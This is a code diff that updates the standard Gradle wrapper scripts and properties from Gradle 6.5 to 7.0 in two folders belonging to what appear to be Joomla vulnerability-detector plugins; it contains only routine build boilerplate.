-"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS% +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* :end @rem End local scope for the variables with windows NT shell -if "%ERRORLEVEL%"=="0" goto mainEnd +if %ERRORLEVEL% equ 0 goto mainEnd :fail rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of rem the _cmd.exe /c_ return code! -if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 -exit /b 1 +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% :mainEnd if "%OS%"=="Windows_NT" endlocal diff --git a/google/detectors/rce/joomla/cve20158562/gradle/wrapper/gradle-wrapper.jar b/google/detectors/rce/joomla/cve20158562/gradle/wrapper/gradle-wrapper.jar index 62d4c0535..d64cd4917 100644 Binary files a/google/detectors/rce/joomla/cve20158562/gradle/wrapper/gradle-wrapper.jar and b/google/detectors/rce/joomla/cve20158562/gradle/wrapper/gradle-wrapper.jar differ diff --git a/google/detectors/rce/joomla/cve20158562/gradle/wrapper/gradle-wrapper.properties b/google/detectors/rce/joomla/cve20158562/gradle/wrapper/gradle-wrapper.properties index 622ab64a3..d04736436 100644 --- a/google/detectors/rce/joomla/cve20158562/gradle/wrapper/gradle-wrapper.properties +++ b/google/detectors/rce/joomla/cve20158562/gradle/wrapper/gradle-wrapper.properties @@ -1,5 +1,7 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME zipStorePath=wrapper/dists diff --git a/google/detectors/rce/joomla/cve20158562/gradlew b/google/detectors/rce/joomla/cve20158562/gradlew index fbd7c5158..1aa94a426 100755 --- a/google/detectors/rce/joomla/cve20158562/gradlew +++ b/google/detectors/rce/joomla/cve20158562/gradlew @@ -1,7 +1,7 @@ -#!/usr/bin/env sh +#!/bin/sh # -# Copyright 2015 the original author or authors. +# Copyright © 2015-2021 the original authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. @@ -17,67 +17,99 @@ # ############################################################################## -## -## Gradle start up script for UN*X -## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. +# ############################################################################## # Attempt to set APP_HOME + # Resolve links: $0 may be a link -PRG="$0" -# Need this for relative symlinks. -while [ -h "$PRG" ] ; do - ls=`ls -ld "$PRG"` - link=`expr "$ls" : '.*-> \(.*\)$'` - if expr "$link" : '/.*' > /dev/null; then - PRG="$link" - else - PRG=`dirname "$PRG"`"/$link" - fi +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac done -SAVED="`pwd`" -cd "`dirname \"$PRG\"`/" >/dev/null -APP_HOME="`pwd -P`" -cd "$SAVED" >/dev/null -APP_NAME="Gradle" -APP_BASE_NAME=`basename "$0"` - -# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. -DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit # Use the maximum available, or set MAX_FD != -1 to use that value. -MAX_FD="maximum" +MAX_FD=maximum warn () { echo "$*" -} +} >&2 die () { echo echo "$*" echo exit 1 -} +} >&2 # OS specific support (must be 'true' or 'false'). cygwin=false msys=false darwin=false nonstop=false -case "`uname`" in - CYGWIN* ) - cygwin=true - ;; - Darwin* ) - darwin=true - ;; - MINGW* ) - msys=true - ;; - NONSTOP* ) - nonstop=true - ;; +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; esac CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar @@ -87,9 +119,9 @@ CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar if [ -n "$JAVA_HOME" ] ; then if [ -x "$JAVA_HOME/jre/sh/java" ] ; then # IBM's JDK on AIX uses strange locations for the executables - JAVACMD="$JAVA_HOME/jre/sh/java" + JAVACMD=$JAVA_HOME/jre/sh/java else - JAVACMD="$JAVA_HOME/bin/java" + JAVACMD=$JAVA_HOME/bin/java fi if [ ! -x "$JAVACMD" ] ; then die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME @@ -98,88 +130,120 @@ Please set the JAVA_HOME variable in your environment to match the location of your Java installation." fi else - JAVACMD="java" - which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. Please set the JAVA_HOME variable in your environment to match the location of your Java installation." + fi fi # Increase the maximum file descriptors if we can. -if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then - MAX_FD_LIMIT=`ulimit -H -n` - if [ $? -eq 0 ] ; then - if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then - MAX_FD="$MAX_FD_LIMIT" - fi - ulimit -n $MAX_FD - if [ $? -ne 0 ] ; then - warn "Could not set maximum file descriptor limit: $MAX_FD" - fi - else - warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" - fi +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac fi -# For Darwin, add options to specify how the application appears in the dock -if $darwin; then - GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" -fi +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. # For Cygwin or MSYS, switch paths to Windows format before running java -if [ "$cygwin" = "true" -o "$msys" = "true" ] ; then - APP_HOME=`cygpath --path --mixed "$APP_HOME"` - CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` - - JAVACMD=`cygpath --unix "$JAVACMD"` - - # We build the pattern for arguments to be converted via cygpath - ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` - SEP="" - for dir in $ROOTDIRSRAW ; do - ROOTDIRS="$ROOTDIRS$SEP$dir" - SEP="|" - done - OURCYGPATTERN="(^($ROOTDIRS))" - # Add a user-defined pattern to the cygpath arguments - if [ "$GRADLE_CYGPATTERN" != "" ] ; then - OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" - fi +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + # Now convert the arguments - kludge to limit ourselves to /bin/sh - i=0 - for arg in "$@" ; do - CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` - CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option - - if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition - eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` - else - eval `echo args$i`="\"$arg\"" + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) fi - i=`expr $i + 1` + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg done - case $i in - 0) set -- ;; - 1) set -- "$args0" ;; - 2) set -- "$args0" "$args1" ;; - 3) set -- "$args0" "$args1" "$args2" ;; - 4) set -- "$args0" "$args1" "$args2" "$args3" ;; - 5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; - 6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; - 7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; - 8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; - 9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; - esac fi -# Escape application args -save () { - for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done - echo " " -} -APP_ARGS=`save "$@"` -# Collect all arguments for the java command, following the shell quoting and substitution rules -eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. +# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' exec "$JAVACMD" "$@" diff --git a/google/detectors/rce/joomla/cve20158562/gradlew.bat b/google/detectors/rce/joomla/cve20158562/gradlew.bat index 5093609d5..93e3f59f1 100644 --- a/google/detectors/rce/joomla/cve20158562/gradlew.bat +++ b/google/detectors/rce/joomla/cve20158562/gradlew.bat @@ -14,7 +14,7 @@ @rem limitations under the License. @rem -@if "%DEBUG%" == "" @echo off +@if "%DEBUG%"=="" @echo off @rem ########################################################################## @rem @rem Gradle startup script for Windows @@ -25,7 +25,8 @@ if "%OS%"=="Windows_NT" setlocal set DIRNAME=%~dp0 -if "%DIRNAME%" == "" set DIRNAME=. +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused set APP_BASE_NAME=%~n0 set APP_HOME=%DIRNAME% @@ -40,7 +41,7 @@ if defined JAVA_HOME goto findJavaFromJavaHome set JAVA_EXE=java.exe %JAVA_EXE% -version >NUL 2>&1 -if "%ERRORLEVEL%" == "0" goto init +if %ERRORLEVEL% equ 0 goto execute echo. echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. @@ -54,7 +55,7 @@ goto fail set JAVA_HOME=%JAVA_HOME:"=% set JAVA_EXE=%JAVA_HOME%/bin/java.exe -if exist "%JAVA_EXE%" goto init +if exist "%JAVA_EXE%" goto execute echo. echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% @@ -64,21 +65,6 @@ echo location of your Java installation. goto fail -:init -@rem Get command-line arguments, handling Windows variants - -if not "%OS%" == "Windows_NT" goto win9xME_args - -:win9xME_args -@rem Slurp the command line arguments. -set CMD_LINE_ARGS= -set _SKIP=2 - -:win9xME_args_slurp -if "x%~1" == "x" goto execute - -set CMD_LINE_ARGS=%* - :execute @rem Setup the command line @@ -86,17 +72,19 @@ set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar @rem Execute Gradle -"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS% +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* :end @rem End local scope for the variables with windows NT shell -if "%ERRORLEVEL%"=="0" goto mainEnd +if %ERRORLEVEL% equ 0 goto mainEnd :fail rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of rem the _cmd.exe /c_ return code! -if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 -exit /b 1 +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% :mainEnd if "%OS%"=="Windows_NT" endlocal diff --git a/google/detectors/rce/joomla/rusty_rce/gradle/wrapper/gradle-wrapper.jar b/google/detectors/rce/joomla/rusty_rce/gradle/wrapper/gradle-wrapper.jar index 62d4c0535..d64cd4917 100644 Binary files a/google/detectors/rce/joomla/rusty_rce/gradle/wrapper/gradle-wrapper.jar and b/google/detectors/rce/joomla/rusty_rce/gradle/wrapper/gradle-wrapper.jar differ diff --git a/google/detectors/rce/joomla/rusty_rce/gradle/wrapper/gradle-wrapper.properties b/google/detectors/rce/joomla/rusty_rce/gradle/wrapper/gradle-wrapper.properties index 622ab64a3..d04736436 100644 --- a/google/detectors/rce/joomla/rusty_rce/gradle/wrapper/gradle-wrapper.properties +++ b/google/detectors/rce/joomla/rusty_rce/gradle/wrapper/gradle-wrapper.properties @@ -1,5 +1,7 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME zipStorePath=wrapper/dists diff --git a/google/detectors/rce/joomla/rusty_rce/gradlew b/google/detectors/rce/joomla/rusty_rce/gradlew index fbd7c5158..1aa94a426 100755 --- a/google/detectors/rce/joomla/rusty_rce/gradlew +++ b/google/detectors/rce/joomla/rusty_rce/gradlew @@ -1,7 +1,7 @@ -#!/usr/bin/env sh +#!/bin/sh # -# Copyright 2015 the original author or authors. +# Copyright © 2015-2021 the original authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. @@ -17,67 +17,99 @@ # ############################################################################## -## -## Gradle start up script for UN*X -## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. +# ############################################################################## # Attempt to set APP_HOME + # Resolve links: $0 may be a link -PRG="$0" -# Need this for relative symlinks. -while [ -h "$PRG" ] ; do - ls=`ls -ld "$PRG"` - link=`expr "$ls" : '.*-> \(.*\)$'` - if expr "$link" : '/.*' > /dev/null; then - PRG="$link" - else - PRG=`dirname "$PRG"`"/$link" - fi +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac done -SAVED="`pwd`" -cd "`dirname \"$PRG\"`/" >/dev/null -APP_HOME="`pwd -P`" -cd "$SAVED" >/dev/null -APP_NAME="Gradle" -APP_BASE_NAME=`basename "$0"` - -# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. -DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit # Use the maximum available, or set MAX_FD != -1 to use that value. -MAX_FD="maximum" +MAX_FD=maximum warn () { echo "$*" -} +} >&2 die () { echo echo "$*" echo exit 1 -} +} >&2 # OS specific support (must be 'true' or 'false'). cygwin=false msys=false darwin=false nonstop=false -case "`uname`" in - CYGWIN* ) - cygwin=true - ;; - Darwin* ) - darwin=true - ;; - MINGW* ) - msys=true - ;; - NONSTOP* ) - nonstop=true - ;; +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; esac CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar @@ -87,9 +119,9 @@ CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar if [ -n "$JAVA_HOME" ] ; then if [ -x "$JAVA_HOME/jre/sh/java" ] ; then # IBM's JDK on AIX uses strange locations for the executables - JAVACMD="$JAVA_HOME/jre/sh/java" + JAVACMD=$JAVA_HOME/jre/sh/java else - JAVACMD="$JAVA_HOME/bin/java" + JAVACMD=$JAVA_HOME/bin/java fi if [ ! -x "$JAVACMD" ] ; then die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME @@ -98,88 +130,120 @@ Please set the JAVA_HOME variable in your environment to match the location of your Java installation." fi else - JAVACMD="java" - which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. Please set the JAVA_HOME variable in your environment to match the location of your Java installation." + fi fi # Increase the maximum file descriptors if we can. -if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then - MAX_FD_LIMIT=`ulimit -H -n` - if [ $? -eq 0 ] ; then - if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then - MAX_FD="$MAX_FD_LIMIT" - fi - ulimit -n $MAX_FD - if [ $? -ne 0 ] ; then - warn "Could not set maximum file descriptor limit: $MAX_FD" - fi - else - warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" - fi +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac fi -# For Darwin, add options to specify how the application appears in the dock -if $darwin; then - GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" -fi +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. # For Cygwin or MSYS, switch paths to Windows format before running java -if [ "$cygwin" = "true" -o "$msys" = "true" ] ; then - APP_HOME=`cygpath --path --mixed "$APP_HOME"` - CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` - - JAVACMD=`cygpath --unix "$JAVACMD"` - - # We build the pattern for arguments to be converted via cygpath - ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` - SEP="" - for dir in $ROOTDIRSRAW ; do - ROOTDIRS="$ROOTDIRS$SEP$dir" - SEP="|" - done - OURCYGPATTERN="(^($ROOTDIRS))" - # Add a user-defined pattern to the cygpath arguments - if [ "$GRADLE_CYGPATTERN" != "" ] ; then - OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" - fi +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + # Now convert the arguments - kludge to limit ourselves to /bin/sh - i=0 - for arg in "$@" ; do - CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` - CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option - - if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition - eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` - else - eval `echo args$i`="\"$arg\"" + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) fi - i=`expr $i + 1` + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg done - case $i in - 0) set -- ;; - 1) set -- "$args0" ;; - 2) set -- "$args0" "$args1" ;; - 3) set -- "$args0" "$args1" "$args2" ;; - 4) set -- "$args0" "$args1" "$args2" "$args3" ;; - 5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; - 6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; - 7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; - 8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; - 9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; - esac fi -# Escape application args -save () { - for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done - echo " " -} -APP_ARGS=`save "$@"` -# Collect all arguments for the java command, following the shell quoting and substitution rules -eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. +# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' exec "$JAVACMD" "$@" diff --git a/google/detectors/rce/joomla/rusty_rce/gradlew.bat b/google/detectors/rce/joomla/rusty_rce/gradlew.bat index 5093609d5..93e3f59f1 100644 --- a/google/detectors/rce/joomla/rusty_rce/gradlew.bat +++ b/google/detectors/rce/joomla/rusty_rce/gradlew.bat @@ -14,7 +14,7 @@ @rem limitations under the License. @rem -@if "%DEBUG%" == "" @echo off +@if "%DEBUG%"=="" @echo off @rem ########################################################################## @rem @rem Gradle startup script for Windows @@ -25,7 +25,8 @@ if "%OS%"=="Windows_NT" setlocal set DIRNAME=%~dp0 -if "%DIRNAME%" == "" set DIRNAME=. +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused set APP_BASE_NAME=%~n0 set APP_HOME=%DIRNAME% @@ -40,7 +41,7 @@ if defined JAVA_HOME goto findJavaFromJavaHome set JAVA_EXE=java.exe %JAVA_EXE% -version >NUL 2>&1 -if "%ERRORLEVEL%" == "0" goto init +if %ERRORLEVEL% equ 0 goto execute echo. echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. @@ -54,7 +55,7 @@ goto fail set JAVA_HOME=%JAVA_HOME:"=% set JAVA_EXE=%JAVA_HOME%/bin/java.exe -if exist "%JAVA_EXE%" goto init +if exist "%JAVA_EXE%" goto execute echo. echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% @@ -64,21 +65,6 @@ echo location of your Java installation. goto fail -:init -@rem Get command-line arguments, handling Windows variants - -if not "%OS%" == 